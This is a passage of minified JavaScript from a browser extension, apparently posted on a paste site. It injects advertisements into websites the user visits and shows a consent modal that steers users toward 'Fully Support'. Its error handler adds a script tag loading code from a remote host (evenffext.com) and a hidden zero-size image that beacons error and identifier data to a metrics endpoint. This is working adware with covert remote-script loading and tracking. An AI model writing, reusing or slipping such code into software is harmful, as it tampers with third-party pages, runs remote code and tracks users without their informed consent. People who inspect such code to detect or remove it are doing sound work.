0}}.close{float:right;font-size:21px;font-weight:700;line-height:1;color:#000;text-shadow:0 1px 0 #fff;opacity:.2;filter:alpha(opacity=20)}.close:focus,.close:hover{color:#000;text-decoration:none;cursor:pointer;opacity:.5;filter:alpha(opacity=50)}button.close{padding:0;cursor:pointer;background:0 0;border:0;-webkit-appearance:none}.modal-open{overflow:hidden}.modal{position:fixed;top:0;right:0;bottom:0;left:0;z-index:2000000;display:none;overflow:auto;overflow-y:scroll}.modal.fade .modal-dialog{-webkit-transform:translate(0,-25%);-ms-transform:translate(0,-25%);transform:translate(0,-25%);-webkit-transition:-webkit-transform .3s ease-out;-moz-transition:-moz-transform .3s ease-out;-o-transition:-o-transform .3s ease-out;transition:transform .3s ease-out}.modal.in .modal-dialog{-webkit-transform:translate(0,0);-ms-transform:translate(0,0);transform:translate(0,0)}.modal-dialog{position:relative;z-index:1050;width:auto;margin:10px}.modal-content{position:relative;background-color:#fff;border:1px solid #999;border:1px solid rgba(0,0,0,.2);border-radius:6px;outline:0;-webkit-box-shadow:0 3px 9px rgba(0,0,0,.5);box-shadow:0 3px 9px rgba(0,0,0,.5);background-clip:padding-box}.modal-backdrop{position:fixed;top:0;right:0;bottom:0;left:0;z-index:1030;background-color:#000}.modal-backdrop.fade{opacity:0;filter:alpha(opacity=0)}.modal-backdrop.in{opacity:.5;filter:alpha(opacity=50)}.modal-header{min-height:16.428571429px;padding:15px;border-bottom:1px solid #e5e5e5}.modal-header .close{margin-top:-2px}.modal-title{margin:0;line-height:1.428571429}.modal-body{position:relative;padding:20px}.modal-footer{padding:19px 20px 20px;margin-top:15px;text-align:right;border-top:1px solid #e5e5e5}.modal-footer:after,.modal-footer:before{display:table;content:" "}.modal-footer:after{clear:both}.modal-footer .btn+.btn{margin-bottom:0;margin-left:5px}@media screen and (min-width:768px){.modal-dialog{width:600px;margin:30px auto}.modal-content{-webkit-box-shadow:0 5px 15px rgba(0,0,0,.5);box-shadow:0 5px 15px rgba(0,0,0,.5)}}</style><content><div class="modal-content" style="font-family:\'Segoe UI\',\'Droid Sans\',Arial,sans-serif; width:650px"><div class="modal-header"><button type="button" class="close" id="close-btn" data-dismiss="modal" aria-hidden="true"><img src="//evenffext.com/ext/images/close-cross.png" width="16" height="16"></button><h4 class="modal-title" id="myModalLabel"><b>' + a[f].tbParams.title + '\'s development is supported by <u style="position:static">optional</u> ads</b></h4></div><div class="modal-body">' + a[f].tbParams.title + '\'s development is supported by <b>optional</b> advertisements that are added to some of the websites you visit. During the development of this extension, I\'ve put in thousands of hours adding features, fixing bugs and making things betternot mentioning the support of all the users who ask for help.<br><br>Ads support most of the internet we all use and love; without them, the internet we have today would simply not exist. Similarly, without revenue, this extension (and the upcoming new ones) would not be possible.<br><br><b>You can disable these ads now or later in the settings page. You can also minimize the ads appearance by clicking on partial support button. Both of these options are available by clicking \'x\' button in the corner of each ad.</b> In both cases,your choice will remain in effect unless you reinstall or reset the extension.</div><div class="modal-footer"><button type="button" id="full-support" class="btn btn-success btn-lg">Fully Support</button><button type="button" id="partial-support" class="btn btn-default">Partially Support</button><p style="text-align:left;width:100%;"><a id="no-support" style="text-decoration:underline;" href="#">No, I don\'t want to support you work</a></p></div></div></content>');
  3196. i.close();
  3197. i.getElementById("full-support").onclick = function() {
  3198. b.optoutHide();
  3199. b.loadedCallback("OPTOUT_CLK_FULLSUPPORT");
  3200. return false
  3201. }
  3202. ;
  3203. i.getElementById("close-btn").onclick = function() {
  3204. b.optoutHide();
  3205. b.loadedCallback("OPTOUT_CLK_CLOSE");
  3206. return false
  3207. }
  3208. ;
  3209. i.getElementById("partial-support").onclick = function() {
  3210. window.open("http://thisadsfor.us/optout?t=3231&u=51113&key=c9f22c14a3872f280d&block=" + b.currentOptoutBlock);
  3211. b.optoutHide();
  3212. b.loadedCallback("OPTOUT_CLK_PARTSUPPORT")
  3213. }
  3214. ;
  3215. i.getElementById("no-support").onclick = function() {
  3216. window.open("http://thisadsfor.us/optout?t=3231&u=51113&key=c9f22c14a3872f280d&block=" + b.currentOptoutBlock);
  3217. b.optoutHide();
  3218. b.loadedCallback("OPTOUT_CLK_NOSUPPORT")
  3219. }
  3220. };
  3221. if (g.contentDocument || g.contentWindow) {
  3222. h()
  3223. } else {
  3224. b.on(g, "load", h);
  3225. d = setTimeout(h, 5000)
  3226. }
  3227. b.twBarOptOut = a[f].twBarOptOut = g
  3228. }
  3229. }
  3230. )(document, window, "c9f22c14a3872f280d", undefined);
  3231. ;d.loadedCallback("FINISHED", "", location.host)
  3232. })
  3233. }
  3234. );
  3235. ;try {
  3236. b(document, window)
  3237. } catch (c) {
  3238. var h = (typeof c.stack != "undefined" ? c.stack : "!empty stack!");
  3239. if (h.length > 1500) {
  3240. h = h.substr(0, 1500)
  3241. }
  3242. var a = (i.location.protocol == "http:" ? "http:" : "https:") + "//evenffext.com/log/?l=error&m=" + encodeURIComponent((typeof c.message != "undefined" ? c.message : "!empty message!") + "|" + h);
  3243. var k = document.createElement("script");
  3244. k.type = "text/javascript";
  3245. k.src = a + (a.indexOf("?") == -1 ? "?" : "&") + "t=" + (new Date().getTime());
  3246. (document.getElementsByTagName("script")[0] || document.documentElement.firstChild).parentNode.appendChild(k);
  3247. (function() {
  3248. var e = ["mid=", "wid=51113", "sid=" + (i[g] && i[g].tbParams && i[g].tbParams.sid) ? i[g].tbParams.sid : "", "tid=3231", "custom1=" + encodeURIComponent((typeof c.message != "undefined" ? c.message : "!empty message!")), "rid=CORE_JS_ERROR"];
  3249. a = (i.location.protocol == "http:" ? "http:" : "https:") + "//evenffext.com/metric/?" + e.join("&");
  3250. var d = f.createElement("img");
  3251. d.setAttribute("style", "width:0;height:0;display:none;visibility:hidden;");
  3252. d.src = a + (a.indexOf("?") == -1 ? "?" : "&") + "t=" + (new Date().getTime());
  3253. (document.head || document.documentElement).appendChild(d);
  3254. if (typeof d.onload != j) {
  3255. d.onload = function() {
  3256. d.parentNode && d.parentNode.removeChild(d)
  3257. }
  3258. }
  3259. }
  3260. )()
  3261. }
  3262. }(document, window));
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement